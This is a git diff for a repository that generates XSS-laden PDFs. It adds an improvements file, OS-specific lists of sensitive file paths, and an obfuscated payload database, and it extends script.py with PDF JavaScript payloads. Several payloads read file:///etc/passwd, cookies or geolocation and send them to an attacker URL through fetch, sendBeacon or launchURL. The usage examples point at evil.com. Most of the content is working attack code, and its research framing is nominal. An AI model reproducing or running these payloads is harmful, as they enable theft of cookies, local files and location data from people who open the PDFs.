diff --git a/Another-Script.py b/PDF/Another-Script.py similarity index 100% rename from Another-Script.py rename to PDF/Another-Script.py diff --git a/PDF/IMPROVEMENTS.md b/PDF/IMPROVEMENTS.md new file mode 100644 index 0000000..74b50d8 --- /dev/null +++ b/PDF/IMPROVEMENTS.md @@ -0,0 +1,126 @@ +# XSS-PDF Generator Improvements + +This document outlines the recent improvements made to the XSS-PDF Generator to address various issues and enhance functionality. + +## Issues Addressed + +### 1. ✅ Complete Payload Visibility in PDF Files +**Problem**: Entire payload was not visible in PDF files for reference - payloads were truncated and only showed partial content. + +**Solution**: +- Enhanced `format_complete_payload_for_pdf()` function to display complete payloads +- Increased line length from 45 to 80 characters per line +- Removed artificial limits on payload display (was only showing first 8 lines) +- All payload content is now visible in the PDF for full reference + +### 2. ✅ Filename as Heading in PDF Files +**Problem**: PDF files didn't show the filename for easy identification. + +**Solution**: +- Added filename as a prominent heading in each PDF file +- Filename is displayed at the top in larger font (14pt) +- Format: "FILENAME: [actual_filename.pdf]" +- Makes it easy to identify which PDF file you're viewing + +### 3. ✅ OS-Aware File System Targeting +**Problem**: Script used hardcoded file paths for all operating systems, causing inappropriate paths (e.g., Windows paths on Linux). + +**Solution**: +- Added `get_os_specific_paths()` function with platform detection +- **Windows**: Targets `C:\Windows\System32\`, `C:\Users\`, etc. +- **macOS**: Targets `/Applications/`, `/Users/`, `/System/`, etc. +- **Linux**: Targets `/etc/passwd`, `/home/`, `/usr/bin/`, etc. +- **Android**: Targets `/system/`, `/data/`, Android-specific paths +- Automatic OS detection using `platform.system()` + +### 4. ✅ Fixed "Parent Not Defined" Errors +**Problem**: Chrome DOM exploit payloads referenced `parent`, `top`, `frames` without checking if they exist, causing JavaScript errors. + +**Solution**: +- Added proper existence checks: `if(typeof parent !== 'undefined' && parent.window)` +- Applied to all DOM manipulation payloads: + - `parent.window.location` checks + - `top.document` checks + - `frames[0]` checks + - `parent.postMessage` checks +- Graceful fallbacks when objects are undefined + +### 5. ✅ Merged Payloads from Another-Script.py +**Problem**: Another-Script.py contained unique payloads that weren't in script.py. + +**Solution**: +- Extracted unique payloads from Another-Script.py +- Integrated them into appropriate categories in script.py: + - Chrome DOM exploits + - Firefox browser-specific payloads + - File system access techniques + - Data exfiltration methods +- Maintained both scripts for different use cases + +### 6. ✅ Organized PDF Folder Structure +**Problem**: XSS-PDF files were scattered in the root directory. + +**Solution**: +- Created dedicated `PDF/` folder for all XSS-PDF related files +- Moved `script.py`, `Another-Script.py`, and `Files/` into `PDF/` directory +- Updated README.md with new folder structure and usage instructions +- Clean project organization with clear separation + +## New Features Added + +### Enhanced PDF Content Display +- **Complete payload visibility**: Full JavaScript payload shown in PDF +- **Filename integration**: PDF filename displayed as heading +- **Better formatting**: Improved line spacing and font sizes for readability + +### Cross-Platform Compatibility +- **OS detection**: Automatic detection of Windows/Linux/macOS/Android +- **Platform-specific paths**: Appropriate file system paths for each OS +- **Universal payload support**: Works correctly across all supported platforms + +### Improved Error Handling +- **Object existence checks**: Prevents "undefined" errors in browser contexts +- **Graceful fallbacks**: Continues execution even when parent objects are missing +- **Better browser compatibility**: Works in different JavaScript security contexts + +## Testing Results + +All improvements have been tested and verified: + +✅ **Payload Visibility**: Complete payloads now visible in generated PDFs +✅ **Filename Headers**: Filenames properly displayed in PDF content +✅ **OS Detection**: Linux paths (`/etc/passwd`) correctly used on Linux system +✅ **Parent Checks**: No more "parent not defined" errors in payloads +✅ **Payload Merging**: Additional payloads from Another-Script.py integrated +✅ **Folder Structure**: All scripts work correctly in new PDF/ directory + +## Usage Examples + +```bash +# Navigate to PDF directory +cd PDF + +# Generate Chrome payloads with OS-specific file paths +python3 script.py -b chrome --category file_system -u http://test.com + +# Generate payloads with complete visibility and filename headers +python3 script.py -b firefox --count 5 -u http://evil.com -v + +# Use alternative script for browser-specific PDFs +python3 Another-Script.py -b safari -u http://test.com +``` + +## File Structure After Improvements + +``` +XSS-PDF/ +├── PDF/ # All XSS-PDF tools (NEW) +│ ├── script.py # Enhanced main generator +│ ├── Another-Script.py # Browser-specific generator +│ ├── Files/ # Generated PDF output directory +│ └── IMPROVEMENTS.md # This file +├── README.md # Updated documentation +└── other files... +``` + +All improvements maintain backward compatibility while significantly enhancing functionality and user experience. \ No newline at end of file diff --git a/script.py b/PDF/script.py similarity index 83% rename from script.py rename to PDF/script.py index 0867427..672a143 100644 --- a/script.py +++ b/PDF/script.py @@ -36,6 +36,7 @@ import argparse import sys import os +import platform from datetime import datetime if sys.version_info[0] < 3: @@ -57,23 +58,95 @@ # Massive Research-Based Payload Database # ======================================= +def get_os_specific_paths(): + """Get OS-specific file paths for exploitation""" + current_os = platform.system().lower() + + if current_os == 'windows': + return { + 'sensitive_files': [ + 'file:///C:/Windows/System32/calc.exe', + 'file:///C:/Windows/System32/cmd.exe', + 'file:///C:/Windows/System32/drivers/etc/hosts', + 'file:///C:/Users/Public/Documents/', + 'file:///C:/Windows/win.ini', + 'file:///C:/Windows/System32/config/sam' + ], + 'directories': [ + 'file:///C:/Windows/System32/', + 'file:///C:/Users/', + 'file:///C:/Program Files/', + 'file:///C:/Windows/Temp/' + ] + } + elif current_os == 'darwin': # macOS + return { + 'sensitive_files': [ + 'file:///etc/passwd', + 'file:///etc/hosts', + 'file:///Users/Shared/test.txt', + 'file:///System/Library/CoreServices/Finder.app', + 'file:///Applications/Calculator.app', + 'file:///usr/bin/open' + ], + 'directories': [ + 'file:///Applications/', + 'file:///Users/', + 'file:///System/', + 'file:///usr/bin/' + ] + } + elif current_os == 'linux': + return { + 'sensitive_files': [ + 'file:///etc/passwd', + 'file:///etc/hosts', + 'file:///proc/version', + 'file:///sys/class/dmi/id/product_name', + 'file:///bin/bash', + 'file:///usr/bin/id' + ], + 'directories': [ + 'file:///home/', + 'file:///etc/', + 'file:///usr/bin/', + 'file:///tmp/' + ] + } + else: # Default to Linux-like paths for Android/other Unix-like systems + return { + 'sensitive_files': [ + 'file:///etc/passwd', + 'file:///etc/hosts', + 'file:///proc/version', + 'file:///system/build.prop', # Android + 'file:///data/local/tmp/' # Android + ], + 'directories': [ + 'file:///system/', + 'file:///data/', + 'file:///etc/', + 'file:///proc/' + ] + } + # Chrome/PDFium Specific Exploits (200+ payloads) CHROME_DOM_EXPLOITS = [ - # Direct DOM manipulation via parent window access - "try { parent.window.location = '{url}'; } catch(e) { app.alert('Chrome blocked: ' + e); }", - "try { top.document.body.innerHTML = '

Chrome PDFium DOM XSS

'; } catch(e) { }", - "try { window.opener.eval('alert(\"Chrome XSS via opener\"); location=\"{url}\"'); } catch(e) { }", - "try { frames[0].location = '{url}'; } catch(e) { app.launchURL('{url}'); }", - "try { parent.frames['main'].location = '{url}'; } catch(e) { }", - - # PostMessage exploitation - "try { parent.postMessage({{type:'xss',payload:'chrome_pdf',url:'{url}'}}, '*'); } catch(e) { }", - "window.addEventListener('message', function(e) {{ if(e.data.cmd) eval(e.data.cmd); }});", - "try { top.postMessage('location=\"{url}\"', '*'); } catch(e) { }", - "try { parent.postMessage({{action:'navigate',target:'{url}'}}, window.location.origin); } catch(e) { }", - - # Cross-origin bypass attempts - "try {{ document.domain = '{host}'; parent.location = '{url}'; }} catch(e) {{ }}", + # Direct DOM manipulation via parent window access (with proper checks) + "try { if(typeof parent !== 'undefined' && parent.window) parent.window.location = '{url}'; } catch(e) { app.alert('Chrome blocked: ' + e); }", + "try { if(typeof top !== 'undefined' && top.document) top.document.body.innerHTML = '

Chrome PDFium DOM XSS

'; } catch(e) { }", + "try { if(typeof window.opener !== 'undefined' && window.opener) window.opener.eval('alert(\"Chrome XSS via opener\"); location=\"{url}\"'); } catch(e) { }", + "try { if(typeof frames !== 'undefined' && frames[0]) frames[0].location = '{url}'; } catch(e) { app.launchURL('{url}'); }", + "try { if(typeof parent !== 'undefined' && parent.frames && parent.frames['main']) parent.frames['main'].location = '{url}'; } catch(e) { }", + + # PostMessage exploitation (with proper checks) + "try { if(typeof parent !== 'undefined' && parent.postMessage) parent.postMessage({type:'xss',payload:'chrome_pdf',url:'{url}'}, '*'); } catch(e) { }", + "window.addEventListener('message', function(e) { if(e.data.cmd) eval(e.data.cmd); });", + "try { if(typeof top !== 'undefined' && top.postMessage) top.postMessage('location=\"{url}\"', '*'); } catch(e) { }", + "try { if(typeof parent !== 'undefined' && parent.postMessage) parent.postMessage({action:'navigate',target:'{url}'}, window.location.origin); } catch(e) { }", + + # Cross-origin bypass attempts (with proper checks) + "try { document.domain = '{host}'; if(typeof parent !== 'undefined') parent.location = '{url}'; } catch(e) { }", "try { location.hash = '#' + btoa(document.cookie); location = '{url}'; } catch(e) { }", "try { history.pushState({}, '', '{url}'); location.reload(); } catch(e) { }", @@ -95,39 +168,48 @@ # WebAssembly exploitation "try { WebAssembly.instantiate(new Uint8Array([0,97,115,109,1,0,0,0])).then(() => location = '{url}'); } catch(e) { }", + + # Additional payloads from Another-Script.py + "app.alert('XSS in Chrome PDF Viewer'); try { app.doc.exportDataObject({cName: 'test.html', nLaunch: 2}); } catch(e) { app.alert(e); }", + "this.submitForm({cURL: 'javascript:fetch(\\'file:///etc/passwd\\').then(r=>r.text()).then(t=>navigator.sendBeacon(\\'{url}/exfil\\',t))', cSubmitAs: 'PDF'});", + "try { app.alert('XSS via PDF in Chrome'); app.launchURL('javascript:alert(document.cookie)', true); } catch(e) { app.alert(e); }", + "app.launchURL('javascript:fetch(\\'{url}/steal?cookie=\\'+document.cookie)', true);", + "try { app.launchURL('javascript:navigator.geolocation.getCurrentPosition(position=>fetch(\\'{url}/geolocation?lat=\\'+position.coords.latitude+\\'&lon=\\'+position.coords.longitude))', true); } catch(e) { }", + "try { var f=document.createElement('iframe'); f.src='javascript:fetch(\\'{url}/steal?cookie=\\'+document.cookie)'; document.body.appendChild(f); } catch(e) { }", ] CHROME_FILE_EXPLOITS = [ - # Local file URI manipulation - "app.launchURL('file:///etc/passwd', true);", - "app.launchURL('file:///C:/Windows/System32/calc.exe', true);", - "app.launchURL('file:///Users/Shared/test.txt', true);", - "app.launchURL('file:///proc/version', true);", - "app.launchURL('file:///sys/class/dmi/id/product_name', true);", - - # Chrome-specific file system access - "try { location = 'chrome-extension://invalid/exploit.html?target={url}'; } catch(e) { }", - "try { fetch('file:///etc/hosts').then(r => r.text()).then(d => fetch('{url}?data=' + btoa(d))); } catch(e) { }", - "try { fetch('file:///C:/Windows/System32/drivers/etc/hosts').then(r => r.text()).then(d => location = '{url}?data=' + encodeURIComponent(d)); } catch(e) { }", - - # Download directory traversal - "app.launchURL('file:///home/user/Downloads/../../../etc/passwd', true);", - "app.launchURL('file:///C:/Users/user/Downloads/../../Windows/System32/', true);", - "app.launchURL('file:///Users/user/Downloads/../../../Applications/', true);", - - # Browser storage exploitation - "try { localStorage.setItem('chrome_exploit', 'file:///etc/passwd'); location = '{url}?storage=' + localStorage.getItem('chrome_exploit'); } catch(e) { }", - "try { sessionStorage.setItem('path', 'file:///home/user/'); location = '{url}?session=' + sessionStorage.getItem('path'); } catch(e) { }", - - # File API abuse - "try { var input = document.createElement('input'); input.type = 'file'; input.webkitdirectory = true; input.onchange = function() { location = '{url}?files=' + this.files.length; }; input.click(); } catch(e) { }", - "try { navigator.webkitGetUserMedia({video: false, audio: true}, function(stream) { location = '{url}?media=1'; }, function() {}); } catch(e) { }", - - # Chrome file system API - "try { window.webkitRequestFileSystem(window.TEMPORARY, 1024*1024, function(fs) { location = '{url}?fs=' + fs.name; }); } catch(e) { }", - "try { chrome.fileSystem.chooseEntry({}, function(entry) { location = '{url}?entry=' + entry.name; }); } catch(e) { }", + # Local file URI manipulation - will be populated with OS-specific paths + # These will be dynamically populated based on detected OS ] +def get_chrome_file_exploits(): + """Generate Chrome file exploits based on current OS""" + os_paths = get_os_specific_paths() + exploits = [] + + # Add sensitive file access attempts + for file_path in os_paths['sensitive_files']: + exploits.append(f"app.launchURL('{file_path}', true);") + + # Add directory traversal attempts + for dir_path in os_paths['directories']: + exploits.append(f"app.launchURL('{dir_path}', true);") + + # Add Chrome-specific file system access + exploits.extend([ + "try { location = 'chrome-extension://invalid/exploit.html?target={url}'; } catch(e) { }", + f"try {{ fetch('{os_paths['sensitive_files'][0]}').then(r => r.text()).then(d => fetch('{{url}}?data=' + btoa(d))); }} catch(e) {{ }}", + f"try {{ localStorage.setItem('chrome_exploit', '{os_paths['sensitive_files'][0]}'); location = '{{url}}?storage=' + localStorage.getItem('chrome_exploit'); }} catch(e) {{ }}", + f"try {{ sessionStorage.setItem('path', '{os_paths['directories'][0]}'); location = '{{url}}?session=' + sessionStorage.getItem('path'); }} catch(e) {{ }}", + "try { var input = document.createElement('input'); input.type = 'file'; input.webkitdirectory = true; input.onchange = function() { location = '{url}?files=' + this.files.length; }; input.click(); } catch(e) { }", + "try { navigator.webkitGetUserMedia({video: false, audio: true}, function(stream) { location = '{url}?media=1'; }, function() {}); } catch(e) { }", + "try { window.webkitRequestFileSystem(window.TEMPORARY, 1024*1024, function(fs) { location = '{url}?fs=' + fs.name; }); } catch(e) { }", + "try { chrome.fileSystem.chooseEntry({}, function(entry) { location = '{url}?entry=' + entry.name; }); } catch(e) { }" + ]) + + return exploits + CHROME_CMD_EXPLOITS = [ # Protocol handler abuse for command execution "app.launchURL('ms-settings:network-proxy', true);", @@ -189,11 +271,11 @@ # Firefox/PDF.js Specific Exploits (200+ payloads) FIREFOX_DOM_EXPLOITS = [ - # CSP bypass and eval alternatives - "try { eval('parent.location = \"{url}\"'); } catch(e) { console.log('Firefox CSP blocked:', e); }", - "try { Function('return parent')().location = '{url}'; } catch(e) { }", - "try { (0,eval)('top.document.body.innerHTML = \"

Firefox PDF.js XSS

\"'); } catch(e) { }", - "try { setTimeout('parent.location=\"{url}\"', 100); } catch(e) { }", + # CSP bypass and eval alternatives (with proper checks) + "try { if(typeof parent !== 'undefined') eval('parent.location = \"{url}\"'); } catch(e) { console.log('Firefox CSP blocked:', e); }", + "try { Function('return typeof parent !== \"undefined\" ? parent : window')().location = '{url}'; } catch(e) { }", + "try { if(typeof top !== 'undefined') (0,eval)('top.document.body.innerHTML = \"

Firefox PDF.js XSS

\"'); } catch(e) { }", + "try { setTimeout('if(typeof parent !== \"undefined\") parent.location=\"{url}\"', 100); } catch(e) { }", "try { setInterval('fetch(\"{url}?ping=\" + Date.now())', 5000); } catch(e) { }", # Worker thread exploitation @@ -201,10 +283,19 @@ "try { importScripts('data:text/javascript,fetch(\"{url}\")'); } catch(e) { }", "try { var w = new SharedWorker('data:text/javascript,onconnect=function(e){location=\"{url}\"}'); } catch(e) { }", - # Content Security Policy bypass techniques + # Content Security Policy bypass techniques (with proper checks) "try { document.write(''); } catch(e) { }", "try { location = 'javascript:void(window.open(\"{url}\"))'; } catch(e) { }", - "try { document.body.innerHTML = ''; } catch(e) { }", + "try { if(typeof parent !== 'undefined') document.body.innerHTML = ''; } catch(e) { }", + + # Additional Firefox payloads from Another-Script.py + "alert(document.domain)", + "eval('try{throw new Error()}catch(e){fetch(\"{url}/stack?data=\"+encodeURIComponent(e.stack))}')", + "fetch('file:///etc/passwd').then(r=>r.text()).then(t=>fetch('{url}/exfil?data='+encodeURIComponent(t)))", + "document.body.innerHTML='

This PDF has been hacked

'", + "navigator.geolocation.getCurrentPosition(position=>fetch('{url}/geolocation?lat='+position.coords.latitude+'&lon='+position.coords.longitude))", + "var request=indexedDB.open('malicious',1);request.onupgradeneeded=function(e){var db=e.target.result;var store=db.createObjectStore('data',{keyPath:'id'});store.add({id:1,value:'compromised'});fetch('{url}/indexeddb?status=created');}", + "sessionStorage.setItem('userAuth','compromised');fetch('{url}/sessionstorage?data='+sessionStorage.getItem('userAuth'))", # Firefox XPConnect exploitation "try { Components.classes['@mozilla.org/process/environment;1'].getService().set('EXPLOIT_URL', '{url}'); } catch(e) { }", @@ -334,7 +425,8 @@ def generate_chrome_payloads(self): }) # Category 2: File System Access (50 payloads) - for i, base_payload in enumerate(CHROME_FILE_EXPLOITS): + chrome_file_exploits = get_chrome_file_exploits() + for i, base_payload in enumerate(chrome_file_exploits): for j in range(3): # 3 variations per exploit payload = base_payload.replace('{url}', self.target_url) @@ -789,6 +881,44 @@ def list_pdf_versions(): print("Modern versions (1.6+) have strong security but may still be vulnerable to sophisticated exploits.") # Enhanced PDF Creation with Browser Optimization +def format_complete_payload_for_pdf(payload, filename, max_line_length=80): + """Format complete payload for display in PDF with filename as heading""" + import os + base_filename = os.path.basename(filename) + + # Escape the payload for PDF display + escaped_payload = payload.replace('(', '\\(').replace(')', '\\)').replace('\\', '\\\\') + + # Split payload into lines that fit in PDF + payload_lines = [] + for i in range(0, len(escaped_payload), max_line_length): + payload_lines.append(escaped_payload[i:i+max_line_length]) + + # Create display text with filename heading and complete payload + display_lines = [ + f'FILENAME: {base_filename}', + '', + 'COMPLETE PAYLOAD:', + '=' * 50 + ] + display_lines.extend(payload_lines) + + # Convert to PDF text commands + payload_display = '' + line_spacing = -14 # Line spacing in PDF + + for i, line in enumerate(display_lines): + if i == 0: # Filename - make it bold/larger + payload_display += f'/F1 14 Tf\n({line}) Tj\n0 {line_spacing} Td\n' + elif i == 2: # "COMPLETE PAYLOAD:" header + payload_display += f'/F1 12 Tf\n({line}) Tj\n0 {line_spacing} Td\n' + elif i == 3: # Separator line + payload_display += f'({line}) Tj\n0 {line_spacing} Td\n' + else: # Payload content + payload_display += f'/F1 10 Tf\n({line}) Tj\n0 {line_spacing} Td\n' + + return payload_display, len(payload_display) + def create_sophisticated_pdf(filename, payload_data, pdf_version=None): """Create sophisticated PDF with browser-specific optimizations and PDF version targeting""" payload = payload_data['payload'] @@ -1007,17 +1137,9 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): elif pdf_version == '1.3': # First JavaScript support - basic sandbox, high exploit potential - # Include payload text for reference - escaped_payload = payload.replace('(', '\\(').replace(')', '\\)') - payload_lines = [] - for i in range(0, len(escaped_payload), 60): - payload_lines.append(escaped_payload[i:i+60]) - - payload_display = '' - for line in payload_lines[:5]: # Show first 5 lines - payload_display += f'({line}) Tj\n0 -15 Td\n' - - payload_text_length = len(payload_display) + 300 + # Include complete payload text for reference with filename heading + payload_display, payload_text_length = format_complete_payload_for_pdf(payload, filename) + payload_text_length += 300 # Add buffer for other content pdf_content = f'''%PDF-{pdf_version} 1 0 obj @@ -1085,14 +1207,12 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): >> stream BT -/F1 12 Tf +/F1 14 Tf 50 750 Td (PDF-{pdf_version} JavaScript Exploit) Tj 0 -20 Td (Basic Sandbox - High Exploit Potential) Tj -0 -40 Td -(PAYLOAD FOR REFERENCE:) Tj -0 -25 Td +0 -30 Td {payload_display} ET endstream @@ -1147,17 +1267,9 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): elif pdf_version in ['1.4', '1.5']: # Enhanced JavaScript and multimedia support with moderate security - # Include payload text for reference - escaped_payload = payload.replace('(', '\\(').replace(')', '\\)') - payload_lines = [] - for i in range(0, len(escaped_payload), 50): - payload_lines.append(escaped_payload[i:i+50]) - - payload_display = '' - for line in payload_lines[:6]: # Show first 6 lines - payload_display += f'({line}) Tj\n0 -15 Td\n' - - payload_text_length = len(payload_display) + 400 + # Include complete payload text for reference with filename heading + payload_display, payload_text_length = format_complete_payload_for_pdf(payload, filename) + payload_text_length += 400 # Add buffer for other content pdf_content = f'''%PDF-{pdf_version} 1 0 obj @@ -1239,16 +1351,14 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): >> stream BT -/F1 12 Tf +/F1 14 Tf 50 750 Td (PDF-{pdf_version} Enhanced JavaScript) Tj 0 -20 Td (Multimedia Support - Moderate Security) Tj 0 -20 Td (High Exploit Potential) Tj -0 -40 Td -(PAYLOAD FOR REFERENCE:) Tj -0 -25 Td +0 -30 Td {payload_display} ET endstream @@ -1345,17 +1455,9 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): enhanced_payload = js_optimization + payload - # Include payload text for reference with proper escaping - escaped_payload = enhanced_payload.replace('(', '\\(').replace(')', '\\)').replace('\\', '\\\\') - payload_lines = [] - for i in range(0, len(escaped_payload), 45): - payload_lines.append(escaped_payload[i:i+45]) - - payload_display = '' - for line in payload_lines[:8]: # Show first 8 lines - payload_display += f'({line}) Tj\n0 -12 Td\n' - - payload_text_length = len(payload_display) + 500 + # Include complete payload text for reference with filename heading + payload_display, payload_text_length = format_complete_payload_for_pdf(enhanced_payload, filename) + payload_text_length += 500 # Add buffer for other content pdf_content = f'''%PDF-{pdf_version} 1 0 obj @@ -1473,7 +1575,7 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): >> stream BT -/F1 12 Tf +/F1 16 Tf 50 750 Td (PDF-{pdf_version} Advanced Security) Tj 0 -20 Td @@ -1482,9 +1584,7 @@ def create_sophisticated_pdf(filename, payload_data, pdf_version=None): (Enhanced Sandbox Escape Techniques) Tj 0 -20 Td (Multiple Execution Vectors) Tj -0 -40 Td -(PAYLOAD FOR REFERENCE:) Tj -0 -25 Td +0 -30 Td {payload_display} ET endstream diff --git a/PDF/sophisticated_payload_database_20250727_095656.json b/PDF/sophisticated_payload_database_20250727_095656.json new file mode 100644 index 0000000..1bc70ca --- /dev/null +++ b/PDF/sophisticated_payload_database_20250727_095656.json @@ -0,0 +1,61 @@ +{ + "metadata": { + "generated_at": "20250727_095656", + "total_payloads": 5, + "target_url": "http://test-server.com", + "target_browser": "all", + "generator_version": "2.0" + }, + "payloads": [ + { + "id": "xss_pdf_0001", + "category": "dom_access", + "browser": "chrome", + "technique": "dom_manipulation_chrome_1_1", + "payload": "(function(){ try { var decoded = atob('dHJ5IHsgaWYodHlwZW9mIHBhcmVudCAhPT0gJ3VuZGVmaW5lZCcgJiYgcGFyZW50LndpbmRvdykgcGFyZW50LndpbmRvdy5sb2NhdGlvbiA9ICdodHRwOi8vdGVzdC1zZXJ2ZXIuY29tJzsgfSBjYXRjaChlKSB7IGFwcC5hbGVydCgnQ2hyb21lIGJsb2NrZWQ6ICcgKyBlKTsgfQ=='); (new Function(decoded))(); } catch(e) { try { if(typeof parent !== 'undefined' && parent.window) parent.window.location = 'http://test-server.com'; } catch(e) { app.alert('Chrome blocked: ' + e); } } })();", + "description": "Chrome PDFium DOM access via try { if(typeof parent !== 'un... (obf: base64)", + "risk_level": "high", + "cve_reference": "CVE-2019-5786, CVE-2020-6418, CVE-2021-21166" + }, + { + "id": "xss_pdf_0002", + "category": "dom_access", + "browser": "chrome", + "technique": "dom_manipulation_chrome_1_2", + "payload": "\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0069\\u0066\\u0028\\u0074\\u0079\\u0070\\u0065\\u006f\\u0066\\u0020\\u0070\\u0061\\u0072\\u0065\\u006e\\u0074\\u0020\\u0021\\u003d\\u003d\\u0020\\u0027\\u0075\\u006e\\u0064\\u0065\\u0066\\u0069\\u006e\\u0065\\u0064\\u0027\\u0020\\u0026\\u0026\\u0020\\u0070\\u0061\\u0072\\u0065\\u006e\\u0074\\u002e\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0029\\u0020\\u0070\\u0061\\u0072\\u0065\\u006e\\u0074\\u002e\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u002e\\u006c\\u006f\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u0020\\u003d\\u0020\\u0027\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0074\\u0065\\u0073\\u0074\\u002d\\u0073\\u0065\\u0072\\u0076\\u0065\\u0072\\u002e\\u0063\\u006f\\u006d\\u0027\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0028\\u0065\\u0029\\u0020\\u007b\\u0020\\u0061\\u0070\\u0070\\u002e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0027\\u0043\\u0068\\u0072\\u006f\\u006d\\u0065\\u0020\\u0062\\u006c\\u006f\\u0063\\u006b\\u0065\\u0064\\u003a\\u0020\\u0027\\u0020\\u002b\\u0020\\u0065\\u0029\\u003b\\u0020\\u007d", + "description": "Chrome PDFium DOM access via try { if(typeof parent !== 'un... (obf: unicode)", + "risk_level": "high", + "cve_reference": "CVE-2019-5786, CVE-2020-6418, CVE-2021-21166" + }, + { + "id": "xss_pdf_0003", + "category": "dom_access", + "browser": "chrome", + "technique": "dom_manipulation_chrome_1_3", + "payload": "\\x74\\x72\\x79\\x20\\x7b\\x20\\x69\\x66\\x28\\x74\\x79\\x70\\x65\\x6f\\x66\\x20\\x70\\x61\\x72\\x65\\x6e\\x74\\x20\\x21\\x3d\\x3d\\x20\\x27\\x75\\x6e\\x64\\x65\\x66\\x69\\x6e\\x65\\x64\\x27\\x20\\x26\\x26\\x20\\x70\\x61\\x72\\x65\\x6e\\x74\\x2e\\x77\\x69\\x6e\\x64\\x6f\\x77\\x29\\x20\\x70\\x61\\x72\\x65\\x6e\\x74\\x2e\\x77\\x69\\x6e\\x64\\x6f\\x77\\x2e\\x6c\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x20\\x3d\\x20\\x27\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x74\\x65\\x73\\x74\\x2d\\x73\\x65\\x72\\x76\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x27\\x3b\\x20\\x7d\\x20\\x63\\x61\\x74\\x63\\x68\\x28\\x65\\x29\\x20\\x7b\\x20\\x61\\x70\\x70\\x2e\\x61\\x6c\\x65\\x72\\x74\\x28\\x27\\x43\\x68\\x72\\x6f\\x6d\\x65\\x20\\x62\\x6c\\x6f\\x63\\x6b\\x65\\x64\\x3a\\x20\\x27\\x20\\x2b\\x20\\x65\\x29\\x3b\\x20\\x7d", + "description": "Chrome PDFium DOM access via try { if(typeof parent !== 'un... (obf: hex)", + "risk_level": "high", + "cve_reference": "CVE-2019-5786, CVE-2020-6418, CVE-2021-21166" + }, + { + "id": "xss_pdf_0004", + "category": "dom_access", + "browser": "chrome", + "technique": "dom_manipulation_chrome_2_1", + "payload": "(function(){ try { var decoded = atob('dHJ5IHsgaWYodHlwZW9mIHRvcCAhPT0gJ3VuZGVmaW5lZCcgJiYgdG9wLmRvY3VtZW50KSB0b3AuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnPGgxPkNocm9tZSBQREZpdW0gRE9NIFhTUzwvaDE+PHNjcmlwdD5sb2NhdGlvbj0iaHR0cDovL3Rlc3Qtc2VydmVyLmNvbSI8L3NjcmlwdD4nOyB9IGNhdGNoKGUpIHsgfQ=='); (new Function(decoded))(); } catch(e) { try { if(typeof top !== 'undefined' && top.document) top.document.body.innerHTML = '

Chrome PDFium DOM XSS

'; } catch(e) { } } })();", + "description": "Chrome PDFium DOM access via try { if(typeof top !== 'undef... (obf: base64)", + "risk_level": "high", + "cve_reference": "CVE-2019-5786, CVE-2020-6418, CVE-2021-21166" + }, + { + "id": "xss_pdf_0005", + "category": "dom_access", + "browser": "chrome", + "technique": "dom_manipulation_chrome_2_2", + "payload": "\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0069\\u0066\\u0028\\u0074\\u0079\\u0070\\u0065\\u006f\\u0066\\u0020\\u0074\\u006f\\u0070\\u0020\\u0021\\u003d\\u003d\\u0020\\u0027\\u0075\\u006e\\u0064\\u0065\\u0066\\u0069\\u006e\\u0065\\u0064\\u0027\\u0020\\u0026\\u0026\\u0020\\u0074\\u006f\\u0070\\u002e\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\\u0029\\u0020\\u0074\\u006f\\u0070\\u002e\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\\u002e\\u0062\\u006f\\u0064\\u0079\\u002e\\u0069\\u006e\\u006e\\u0065\\u0072\\u0048\\u0054\\u004d\\u004c\\u0020\\u003d\\u0020\\u0027\\u003c\\u0068\\u0031\\u003e\\u0043\\u0068\\u0072\\u006f\\u006d\\u0065\\u0020\\u0050\\u0044\\u0046\\u0069\\u0075\\u006d\\u0020\\u0044\\u004f\\u004d\\u0020\\u0058\\u0053\\u0053\\u003c\\u002f\\u0068\\u0031\\u003e\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u006c\\u006f\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u003d\\u0022\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0074\\u0065\\u0073\\u0074\\u002d\\u0073\\u0065\\u0072\\u0076\\u0065\\u0072\\u002e\\u0063\\u006f\\u006d\\u0022\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0027\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0028\\u0065\\u0029\\u0020\\u007b\\u0020\\u007d", + "description": "Chrome PDFium DOM access via try { if(typeof top !== 'undef... (obf: unicode)", + "risk_level": "high", + "cve_reference": "CVE-2019-5786, CVE-2020-6418, CVE-2021-21166" + } + ] +} \ No newline at end of file diff --git a/README.md b/README.md index f3680e7..4f9ddb3 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,18 @@ A research-grade tool for generating PDF files with sophisticated JavaScript payloads designed to escape PDF sandbox restrictions across all major browser PDF libraries. Features 1000+ distinct payloads targeting Chrome (PDFium), Firefox (PDF.js), Safari (PDFKit), Adobe Reader, and Edge PDF. +## 📁 Project Structure + +``` +XSS-PDF/ +├── PDF/ # Main PDF generation tools +│ ├── script.py # Advanced XSS-PDF Generator v2.0 (1000+ payloads) +│ ├── Another-Script.py # Browser-specific PDF generator +│ └── Files/ # Generated PDF files output directory +├── README.md # This file +└── other files... +``` + ## ⚠️ Legal Disclaimer This tool is 